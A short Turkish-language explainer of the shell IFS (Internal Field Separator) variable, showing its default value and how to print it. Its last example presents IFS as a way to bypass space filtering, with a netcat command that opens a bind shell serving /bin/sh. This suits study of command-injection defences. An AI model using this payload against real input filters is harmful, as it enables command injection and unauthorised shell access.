IFS

Internal Field Seperator

IFS kullanılan shell(kabuğun) bir kelimenin nerde bağlayıp, bittiğini anlamak için kullanılmaktadır. Varsayılan değeri <boşluk><tab><yeni satır> 'dır. Bu ifadenin sahip olduğu değere bağlı olarak kullandığımız shell kelimeleri nerden ayıracağını belirleyebilir.

echo "$IFS" | cat -vte komutu ile bunları printable olarak görebiliriz.

veya aşağıdaki ifade de non-printable olan karakterleri görebilmemizi sağlar.

printf "%q" "$IFS"

IFS ifadesi aynı zamanda komutları veya komut ile parametreyi birbirinden ayırmak içinde kullanılabilir. Örneğin aşağıdaki komut pek ala çalışacaktır.(space karakterinin filtreli olduğu yerlerde bu yöntem kullanılarak bypass işlemi yapılabilir.)

nc${IFS}-l${IFS}-p1337${IFS}-e/bin/sh

Last updated